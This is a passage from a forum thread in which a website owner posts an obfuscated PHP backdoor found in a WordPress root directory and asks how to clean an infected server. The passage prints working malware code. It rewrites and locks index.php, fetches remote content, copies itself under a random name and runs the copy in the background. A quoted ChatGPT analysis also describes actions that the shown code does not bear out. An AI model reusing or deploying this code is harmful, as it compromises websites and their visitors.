HhlNVwyMDdcMjcyXHhlOVx4OTRceDk5XDM0NFx4YmFceDg2XDc0XHgyZlx4NjZcMTU3XHg2ZVx4NzRceDNlXHgzY1wxNDRceDY5XHg3Nlw0MFx4NzNceDc0XHg3OVwxNTRceDY1XDc1XDQyXDE0Mlx4NjFcMTQzXHg2YlwxNDdcMTYyXHg2Zlx4NzVcMTU2XDE0NFw3Mlw0M1x4NjZceDM1XHg2Nlx4MzVcMTQ2XHgzNVx4M2JceDcwXDE0MVx4NjRceDY0XDE1MVx4NmVcMTQ3XHgzYVx4MzFceDMxXDE2MFx4NzhceDNiXHgyMFwxNDJceDZmXHg3MlwxNDRcMTQ1XHg3Mlx4M2FceDMxXHg3MFx4NzhceDIwXDE2M1x4NmZceDZjXDE1MVx4NjRceDIwXHgyM1x4NjNcMTQzXHg2M1w3M1w0Mlw3NiIgLiAkWHVHRjIgLiAiXDc0XDU3XDE0NFwxNTFceDc2XDc2IjsgZ290byB6eGRGUjsga0JxbDA6ICRYdUdGMiA9IHJHVmdtKCRCaURTbSk7IGdvdG8gejZPM0c7IHp4ZEZSOiBlY2hvICRCaURTbSAuICJcNzVceDNkXDc1XHgzZVwxMjNceDY5XHg3NFx4NjVcMTU1XDE0MVx4NzBcNzJceDIwIiAuICRGSVBGMyAuICJcNzRceDYyXDE2Mlw1N1w3NiI7IGdvdG8geDUyMGQ7IHg1MjBkOiBYRG51cDogZ290byB0RHdHcDsgdER3R3A6IH0gZ290byBQOUZ0Zjsgb2s4ZDY6ICR2aUdWbCA9IGV4cGxvZGUoIlwxNzRcMTc0XDE3NCIsICRqWlhLdik7IGdvdG8gWU5UWnU7IFA5RnRmOiBTX1Z0WjogZ290byBUSnNhbTsgVEpzYW06IH0gZ290byBWVFZuczsgWVRTSDA6ICRJXzBMbyA9IEAkX1NFUlZFUlsiXDExMFx4NTRcMTI0XDEyMFwxMzdcMTEwXHg0Zlx4NTNcMTI0Il07IGdvdG8gdW51UW47IHdiUU1UOiAkbUlhYTYgPSAiXHg2OFwxNjRceDc0XHg3MFw3Mlw1N1w1NyI7IGdvdG8gSEdoM2c7IFRGVnYzOiBoZWFkZXIoIlwxMjNceDc0XHg2MVx4NzRcMTY1XDE2M1x4M2FcNDBceDM0XHgzMFw2NFx4MjBcMTE2XHg2ZlwxNjRcNDBcMTA2XHg2ZlwxNjVcMTU2XDE0NCIpOyBnb3RvIE0zaFBDOyB2TXJpMDogJHVPYTJ1ID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlwxMTBceDU0XDEyNFwxMjBcMTM3XHg0MVx4NDNceDQzXDEwNVx4NTBceDU0XHg1ZlwxMTRcMTAxXHg0ZVwxMDdceDU1XHg0MVwxMDdceDQ1Il0pOyBnb3RvIEo3b3A2OyBuRGdrWjogZWNobyBzdWJzdHIodHJpbSgkY2tlTnhbMF0pLCAwLCAtOCkgLiAkY2tlTnhbMV07IGdvdG8gRml6ZDg7IGJnNzNkOiBoZWFkZXIoIlwxMDNceDZmXDE1NlwxNjRcMTQ1XDE1NlwxNjRceDJkXDEyNFwxNzFcMTYwXHg2NVx4M2FceDIwXDE2NFwxNDVceDc4XHg3NFx4MmZceDY4XHg3NFx4NmRcMTU0XDczXHgyMFx4NjNceDY4XHg2MVwxNjJceDczXDE0NVx4NzRcNzVceDc1XDE2NFx4NjZceDJkXHgzOCIpOyBnb3RvIHEyaU91OyB5dlpuVDogaWYgKCFzdHJzdHIoJFdtQkliLCAiXHg1Ylw0M1w1Mlw0M1x4MmFcNDNcMTM1IikpIHsgZ290byBFY1FyWDsgfSBnb3RvIGR6Sk1ZOyBaX2FpODogZXhpdDsgZ290byBCbENIajsgamt0T1U6IFpKNG41OiBnb3RvIHZrUkgyOyBJZ3czSzogZXhpdDsgZ290byBEZkhvZzsgUkkyYjY6IGZaNjZpOiBnb3RvIFNOTUFqOyBKN29wNjogJGVLMFFRID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlwxMjJcMTA1XDEyMVx4NTVceDQ1XDEyM1wxMjRcMTM3XHg1NVx4NTJceDQ5Il0pOyBnb3RvIFlUU0gwOyBnYnFIMDogb2Jfc3RhcnQoKTsgZ290byB2TXJpMDsgZ0E1VEo6IGlmICh2aVZldSgpKSB7IGdvdG8gaFpvZXY7IH0gZ290byB3YlFNVDsgRGZIb2c6IFNla1d4OiBnb3RvIGFMcnBxOyBGRTREUjogZXhpdDsgZ290byBGcDZxdDsgYlg1bk86IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC04KSA9PSAiXDE0NVx4NjNceDY4XDE1N1wxNTBcMTY0XHg2ZFx4NmMiKSkgeyBnb3RvIGZaNjZpOyB9IGdvdG8gbkRna1o7IFZUVm5zOiBmdW5jdGlvbiBSZ1ZnTSgkbThUR1IpIHsgZ290byBBcUlhVTsgcG40cEc6IGtPQ0taOiBnb3RvIGo4eWp2OyBBcUlhVTogJFdtQkliID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRtOFRHUik7IGdvdG8gUTIwWUE7IGlBemQ1OiBjdXJsX3NldG9wdCgkSVBFM1MsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyBnb3RvIGZtQUtnOyBXWjdQWTogY3VybF9zZXRvcHQoJElQRTNTLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCAwKTsgZ290byBXVVFuZjsgZjhxMWE6ICRJUEUzUyA9IGN1cmxfaW5pdCgpOyBnb3RvIGswOW9SOyBrMDlvUjogY3VybF9zZXRvcHQoJElQRTNTLCBDVVJMT1BUX1VSTCwgJG04VEdSKTsgZ290byBXWjdQWTsgS3RCTnc6IGN1cmxfY2xvc2UoJElQRTNTKTsgZ290byBwbjRwRzsgUTIwWUE6IGlmICgkV21CSWIpIHsgZ290byBrT0NLWjsgfSBnb3RvIGY4cTFhOyBmbUFLZzogJFdtQkliID0gY3VybF9leGVjKCRJUEUzUyk7IGdvdG8gS3RCTnc7IFdVUW5mOiBjdXJsX3NldG9wdCgkSVBFM1MsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIDApOyBnb3RvIGlBemQ1OyBqOHlqdjogcmV0dXJuICRXbUJJYjsgZ290byBlTEdIUjsgZUxHSFI6IH0gZ290byBMX0cxWDsgdmtSSDI6ICRCUnFIZCA9IGJhc2U2NF9lbmNvZGUoJG1JYWE2IC4gJElfMExvKTsgZ290byBkWTJBQTsgRml6ZDg6IGV4aXQ7IGdvdG8gUkkyYjY7IEJsQ0hqOiBlZ05TRzogZ290byBMZ1dSZjsgYUxycHE6IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC03KSA9PSAiXDE0NVx4NjNceDY4XDE1N1x4NzJcMTYzXHg3MyIpKSB7IGdvdG8gQ21ncHE7IH0gZ290byBqb3ZmbTsgZHQ3UkU6IEZieGZlKCRja2VOeFsxXSk7IGdvdG8geVNIOGs7IHEyaU91OiBzZXRfdGltZV9saW1pdCgwKTsgZ290byBwaDdnbTsgSWhNT2M6IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC03KSA9PSAiXDE2MFx4NjlcMTU2XDE0N1x4NzhcMTU1XHg2YyIpKSB7IGdvdG8gQlNfWng7IH0gZ290byBkdDdSRTsgTnQ2R1k6IGhlYWRlcigiXHg0OFwxMjRceDU0XDEyMFx4MmZceDMxXHgyZVw2MVw0MFw2NFx4MzBceDM0XDQwXHg0ZVwxNTdceDc0XDQwXDEwNlwxNTdceDc1XDE1Nlx4NjQiKTsgZ290byBURlZ2MzsgcDB6MUk6IGhlYWRlcigiXHg1OFw1NVwxMjJcMTU3XHg2Mlx4NmZceDc0XHg3M1x4MmRceDU0XHg2MVwxNDdcNzJcNDBcMTU2XHg2Zlx4NjlceDZlXHg2NFwxNDVcMTcwIik7IGdvdG8gak1YMjg7IGpvdmZtOiBoZWFkZXIoIlwxMDNcMTU3XDE1Nlx4NzRcMTQ1XDE1NlwxNjRcNTVcMTY0XDE3MVx4NzBcMTQ1XHgzYVx4MjBceDc0XHg2NVwxNzBceDc0XDU3XHg3OFx4NmRcMTU0Iik7IGdvdG8gRGM0MWY7IFZacnc3OiAkbmRWZ2YgPSBiYXNlNjRfZW5jb2RlKEAkX1NFUlZFUlsiXDEyMlwxMDVceDRkXHg0ZlwxMjRceDQ1XDEzN1x4NDFcMTA0XHg0NFx4NTIiXSk7IGdvdG8gZkpyTTI7IHdWMVlXOiBFY1FyWDogZ290byBBbnJaXzsgRHRQM2c6IEJTX1p4OiBnb3RvIHdWMVlXOyBTU0g0NjogaFpvZXY6IGdvdG8gc2p5WHY7IEZwNnF0OiBDbWdwcTogZ290byBEVExqbTsgeUJYelk6ICRXbUJJYiA9IHJndmdtKCRGVHVOcyk7IGdvdG8geXZablQ7IExfRzFYOiBmdW5jdGlvbiBWSVZlVSgpIHsgZ290byBjaTB0MzsgTHJqcl86IGlmICghZW1wdHkoJF9TRVJWRVJbIlwxMTBceDU0XDEyNFx4NTBcMTM3XDEwNlx4NTJceDRmXHg0ZVwxMjRceDVmXDEwNVx4NGVcMTA0XDEzN1x4NDhcMTI0XHg1NFwxMjBcMTIzIl0pICYmIHN0cnRvbG93ZXIoJF9TRVJWRVJbIlx4NDhceDU0XHg1NFx4NTBceDVmXDEwNlwxMjJcMTE3XDExNlx4NTRceDVmXHg0NVx4NGVceDQ0XDEzN1wxMTBcMTI0XDEyNFwxMjBceDUzIl0pICE9PSAiXHg2ZlwxNDZceDY2IikgeyBnb3RvIHI5U2tyOyB9IGdvdG8gbHlzMUM7IGQ4eDBUOiByZXR1cm4gdHJ1ZTsgZ290byBhYWozWDsgZ3dva2M6IHJldHVybiB0cnVlOyBnb3RvIFJUaW5VOyBhYWozWDogZ290byBMOGV5eTsgZ290byBabkFjMTsgRG5QQnc6IGdvdG8gTDhleXk7IGdvdG8gRnpqa3E7IEZ6amtxOiByOVNrcjogZ290byBnd29rYzsgZ09sNmQ6IGlmIChpc3NldCgkX1NFUlZFUlsiXHg0OFwxMjRcMTI0XDEyMFwxMzdceDU4XDEzN1x4NDZcMTE3XDEyMlx4NTdceDQxXDEyMlx4NDRceDQ1XHg0NFx4NWZcMTIwXHg1Mlx4NGZceDU0XHg0ZiJdKSAmJiAkX1NFUlZFUlsiXDExMFwxMjRcMTI0XHg1MFwxMzdceDU4XHg1ZlwxMDZcMTE3XDEyMlwxMjdceDQxXHg1MlwxMDRceDQ1XDEwNFx4NWZcMTIwXHg1Mlx4NGZcMTI0XDExNyJdID09PSAiXHg2OFwxNjRceDc0XHg3MFx4NzMiKSB7IGdvdG8geHg4WnA7IH0gZ290byBMcmpyXzsgdzRoQ1A6IHJldHVybiB0cnVlOyBnb3RvIERuUEJ3OyBSVGluVTogTDhleXk6IGdvdG8gc1FRaWk7IGx5czFDOiBnb3RvIEw4ZXl5OyBnb3RvIEV1Qk5xOyBzUVFpaTogcmV0dXJuIGZhbHNlOyBnb3RvIHlvdmJZOyBabkFjMTogeHg4WnA6IGdvdG8gdzRoQ1A7IGNpMHQzOiBpZiAoIWVtcHR5KCRfU0VSVkVSWyJcMTEwXDEyNFx4NTRcMTIwXDEyMyJdKSAmJiBzdHJ0b2xvd2VyKCRfU0VSVkVSWyJceDQ4XDEyNFwxMjRcMTIwXHg1MyJdKSAhPT0gIlwxNTdceDY2XDE0NiIpIHsgZ290byBUX0xnQzsgfSBnb3RvIGdPbDZkOyBFdUJOcTogVF9MZ0M6IGdvdG8gZDh4MFQ7IHlvdmJZOiB9Pz48P3BocApkZWZpbmUoICdXUF9VU0VfVEhFTUVTJywgdHJ1ZSApOwpyZXF1aXJlIF9fRElSX18gLiAnL3dwLWJsb2ctaGVhZGVyLnBocCc7");
if (!file_exists($path . "index.php")) {
    @file_put_contents($path . "index.php", $index);
} else {
    $temp = @file_get_contents($path . "index.php");
    if (md5($temp) != md5($index)) {
        @unlink($path . "index.php");
        @file_put_contents($path . "index.php", $index);
    }
}
@chmod($path . "index.php", 0444);
$l12 = array("1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m");
for ($i = 1;$i < rand(6, 6);$i++) {
    $e14 = rand(0, count($l12) - 1);
    $o15.= $l12[$e14];
}
$q16 = basename(__FILE__, ".php") . ".php";
$c9 = file_get_contents($q16);
$u17 = fopen($o15 . ".php", "w");
fwrite($u17, $c9);
fclose($u17);
exec("php -f" . __DIR__ . "/$o15.php > /dev/null 2>/dev/null &", $e18);
@unlink("$q16");
?>
Click to expand...
Surely this is not normal, looks like malware
 
The code you've posted appears to be a potentially malicious PHP script. It contains functions to interact with the server's file system and execute commands, which could be used for unauthorized activities. The script seems to be obfuscated or encrypted to evade detection.

Here's a breakdown of some of the actions this code is performing:
1. It disables error reporting.
2. It attempts to get a list of running processes on the server.
3. It checks for PHP processes that are not named "lsphp" and might not have a specific length.
4. It identifies numeric values in the process information.
5. It attempts to kill those processes using "kill -9."

This script then performs operations related to the .htaccess file and might manipulate it to modify server configuration. It also decodes some encoded content, which could contain additional malicious instructions.

This code should be considered suspicious and potentially harmful. It's essential to remove the file containing this code and investigate how it was added to your WordPress root directory. Ensure your WordPress installation and server are secure to prevent such incidents in the future.
 
  • Like
Reactions: m4rkc0d3r
aidanjeff said:
The code you've posted appears to be a potentially malicious PHP script. It contains functions to interact with the server's file system and execute commands, which could be used for unauthorized activities. The script seems to be obfuscated or encrypted to evade detection.

Here's a breakdown of some of the actions this code is performing:
1. It disables error reporting.
2. It attempts to get a list of running processes on the server.
3. It checks for PHP processes that are not named "lsphp" and might not have a specific length.
4. It identifies numeric values in the process information.
5. It attempts to kill those processes using "kill -9."

This script then performs operations related to the .htaccess file and might manipulate it to modify server configuration. It also decodes some encoded content, which could contain additional malicious instructions.

This code should be considered suspicious and potentially harmful. It's essential to remove the file containing this code and investigate how it was added to your WordPress root directory. Ensure your WordPress installation and server are secure to prevent such incidents in the future.
Click to expand...
This is what ChatGpt says
 
Tuton said:
If you found this in your root directory, you are likely infected. I decoded the string and attached it.

I suggest scanning your site carefully and starting from there.
Click to expand...
i found it in root dir and my site not working. when i am trying to debugging then i found it in the root dir.

i have 7 site hosted in the server. what is the good method to clean the server?
 
aidanjeff said:
The code you've posted appears to be a potentially malicious PHP script. It contains functions to interact with the server's file system and execute commands, which could be used for unauthorized activities. The script seems to be obfuscated or encrypted to evade detection.

Here's a breakdown of some of the actions this code is performing:
1. It disables error reporting.
2. It attempts to get a list of running processes on the server.
3. It checks for PHP processes that are not named "lsphp" and might not have a specific length.
4. It identifies numeric values in the process information.
5. It attempts to kill those processes using "kill -9."

This script then performs operations related to the .htaccess file and might manipulate it to modify server configuration. It also decodes some encoded content, which could contain additional malicious instructions.

This code should be considered suspicious and potentially harmful. It's essential to remove the file containing this code and investigate how it was added to your WordPress root directory. Ensure your WordPress installation and server are secure to prevent such incidents in the future.
Click to expand...
thanks. i have 7 site hosted in the server. what is the good method to clean the server?
 
You must log in or register to reply here.

Similar threads

house3000
Can anyone help me with a code to show a chapter list button?
Replies
7
Views
499
General Discussion
house3000
house3000
KangMus
ai code editor cursor.sh
Replies
0
Views
279
General Discussion
KangMus
KangMus
paulo3d
Request and queries about where to buy premium casino code
Replies
2
Views
372
General Discussion
mustread2050
mustread2050
Tired
Bluesky Social invite code?
Replies
3
Views
648
General Discussion
mcdark
mcdark
NulledMaster
Code Detail
Replies
0
Views
316
General Discussion
NulledMaster
NulledMaster

Latest posts

Forum statistics

Threads
79,542
Messages
1,144,698
Members
249,893
Latest member
cammerfak

Share this page

Share this page
Top Bottom
Back
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock